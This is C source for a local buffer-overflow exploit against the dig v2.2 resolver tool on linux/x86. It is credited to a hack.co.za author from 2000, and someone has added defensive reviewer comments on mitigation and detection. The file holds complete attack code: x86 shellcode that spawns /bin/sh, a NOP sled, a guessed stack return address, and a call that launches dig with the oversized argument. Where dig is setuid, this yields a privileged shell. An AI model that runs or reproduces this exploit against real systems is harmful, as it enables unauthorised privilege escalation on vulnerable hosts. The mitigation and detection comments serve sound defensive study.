/*
   private
   dig v2.2 local exploit example for linux/x86
   
   note that dig isn't suid/sgid on some platforms, yet on some it is. 
   
   - anathema <anathema@hack.co.za>
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Proof-of-concept driver: builds one ~9 KB argument string and executes
 * /usr/bin/dig with it as the query argument.
 *
 * Reviewer notes (defensive reading):
 *  - Per the file header the target is dig v2.2 on linux/x86, and the issue
 *    only crosses a privilege boundary where dig is installed suid/sgid.
 *    Presumably dig copies this argument into a fixed-size stack buffer
 *    without a length check; the dig source is not shown here, so confirm
 *    against the vendor advisory.
 *  - Mitigation: remove the suid/sgid bits from dig (it does not need them
 *    to resolve names) and upgrade the resolver tools. The stack address
 *    below is only a guess derived from this process's own frame, so stack
 *    address randomisation and a non-executable stack break that assumption.
 *  - Detection: an exec of dig whose argument is thousands of bytes long
 *    (a DNS name is at most 255 bytes) and is dominated by 0x90 bytes is a
 *    strong indicator of this pattern in process-execution logs.
 *
 * argc/argv are unused; every value is hard-coded. The function has no
 * return statement; if execl() fails, control falls off the end without
 * any error being reported.
 */
main(int argc, char **argv)
{
  /* Staging area for the argument; only bytes 0..9090 are written below. */
  char buf[9500];
  /* offset: fixed adjustment added to the stack-address guess. */
  int i,offset=2000;

  /*
   * Opaque machine-code payload (linux/x86 per the file header). The
   * trailing literal is the path "/bin/sh"; presumably the code runs it.
   */
  char shellc[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b"
    "\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8"
    "\xde\xff\xff\xff/bin/sh";

  /*
   * Stores the address of this local in itself, as an estimate of where
   * the stack lives. This is a pointer-to-integer conversion without a
   * cast; only the low 32 bits are used further down.
   */
  long addr=&addr;

  addr+=offset;
  /* Filler: 0x90 (the x86 one-byte NOP) up to where the payload starts. */
  memset(buf, 0x90, 9087-strlen(shellc));
  /*
   * Copy the payload so that it ends just before index 9087. sizeof()
   * includes the terminating NUL, which lands on buf[9087] and is then
   * overwritten by the address byte stored there below.
   */
  for(i=0;i < sizeof(shellc);i++) buf[i+9087-strlen(shellc)] = shellc[i];
  /* Low 32 bits of addr at buf[9087..9090], least-significant byte first. */
  buf[9090] = (addr & 0xff000000) >> 24;
  buf[9089] = (addr & 0x00ff0000) >> 16;
  buf[9088] = (addr & 0x0000ff00) >> 8;
  buf[9087] = (addr & 0x000000ff);

  /* Replace this process with dig, passing buf as its only argument. */
  execl("/usr/bin/dig", "dig", buf, NULL);
}

/* private */
/*                    www.hack.co.za              [2000]*/